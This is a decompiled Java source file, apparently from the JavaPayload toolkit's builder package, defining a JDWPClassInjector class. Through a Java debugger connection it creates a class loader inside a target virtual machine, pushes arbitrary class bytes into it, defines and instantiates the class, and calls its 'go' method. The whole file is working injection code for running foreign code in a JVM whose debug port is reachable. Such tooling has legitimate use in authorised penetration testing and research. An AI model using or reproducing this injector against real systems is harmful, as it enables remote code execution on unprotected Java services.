/*
 * Decompiled with CFR 0.152.
 */
package javapayload.builder;

import com.sun.jdi.ArrayReference;
import com.sun.jdi.ByteValue;
import com.sun.jdi.ClassObjectReference;
import com.sun.jdi.ClassType;
import com.sun.jdi.Method;
import com.sun.jdi.ObjectReference;
import com.sun.jdi.ThreadReference;
import com.sun.jdi.Value;
import com.sun.jdi.VirtualMachine;
import java.util.Arrays;

public class JDWPClassInjector {
    private final ThreadReference thread;
    private final VirtualMachine virtualMachine;
    private final ObjectReference myClassLoader;
    private final ClassType _Class;
    private final ClassType _Array;
    private final ClassType _URLClassLoader;
    private final ClassType _byte;

    public JDWPClassInjector(ThreadReference thread) throws Exception {
        this.thread = thread;
        this.virtualMachine = thread.virtualMachine();
        this._Class = (ClassType)this.virtualMachine.classesByName("java.lang.Class").get(0);
        this._Array = this.loadClass("java.lang.reflect.Array");
        this._URLClassLoader = this.loadClass("java.net.URLClassLoader");
        ClassType _Byte = this.loadClass("java.lang.Byte");
        this._byte = (ClassType)((ClassObjectReference)_Byte.getValue(_Byte.fieldByName("TYPE"))).reflectedType();
        ArrayReference urls = this.buildArray(this.loadClass("java.net.URL"), 0);
        this.myClassLoader = this.newInstance(this._URLClassLoader, "([Ljava/net/URL;)V", new Value[]{urls});
    }

    private ArrayReference buildArray(ClassType baseType, int length) throws Exception {
        return (ArrayReference)this.invokeStaticMethod(this._Array, "newInstance", "(Ljava/lang/Class;I)Ljava/lang/Object;", new Value[]{baseType.classObject(), this.virtualMachine.mirrorOf(length)});
    }

    public ClassType inject(byte[] clazz, String argsForInstantiate) throws Exception {
        ArrayReference array = this.buildArray(this._byte, clazz.length);
        ByteValue[] byteValues = new ByteValue[clazz.length];
        for (int i = 0; i < clazz.length; ++i) {
            byteValues[i] = this.virtualMachine.mirrorOf(clazz[i]);
        }
        array.setValues(Arrays.asList(byteValues));
        ObjectReference loadedClazz = (ObjectReference)this.invokeMethod(this.myClassLoader, this._URLClassLoader, "defineClass", "([BII)Ljava/lang/Class;", new Value[]{array, this.virtualMachine.mirrorOf(0), this.virtualMachine.mirrorOf(clazz.length)});
        ClassType _clazz = (ClassType)((ClassObjectReference)loadedClazz).reflectedType();
        if (argsForInstantiate != null) {
            this.invokeMethod(this.myClassLoader, this._URLClassLoader, "resolveClass", "(Ljava/lang/Class;)V", new Value[]{loadedClazz});
            this.invokeMethod(loadedClazz, this._Class, "getMethods", "()[Ljava/lang/reflect/Method;", new Value[0]);
            ObjectReference loadedInstance = this.newInstance(_clazz, "()V", new Value[0]);
            this.invokeMethod(loadedInstance, _clazz, "go", "(Ljava/lang/String;)V", new Value[]{this.virtualMachine.mirrorOf(argsForInstantiate)});
        }
        return _clazz;
    }

    private Value invokeMethod(ObjectReference object, ClassType _class, String name, String signature, Value[] parameters) throws Exception {
        Method method = _class.concreteMethodByName(name, signature);
        if (method == null) {
            throw new IllegalArgumentException("Method not found: " + name + " " + signature);
        }
        return object.invokeMethod(this.thread, method, Arrays.asList(parameters), 0);
    }

    private Value invokeStaticMethod(ClassType _class, String name, String signature, Value[] parameters) throws Exception {
        return _class.invokeMethod(this.thread, _class.concreteMethodByName(name, signature), Arrays.asList(parameters), 0);
    }

    private ClassType loadClass(String className) throws Exception {
        return (ClassType)((ClassObjectReference)this._Class.invokeMethod(this.thread, this._Class.concreteMethodByName("forName", "(Ljava/lang/String;)Ljava/lang/Class;"), Arrays.asList(this.virtualMachine.mirrorOf(className)), 0)).reflectedType();
    }

    private ObjectReference newInstance(ClassType _class, String signature, Value[] parameters) throws Exception {
        return _class.newInstance(this.thread, _class.concreteMethodByName("<init>", signature), Arrays.asList(parameters), 0);
    }
}

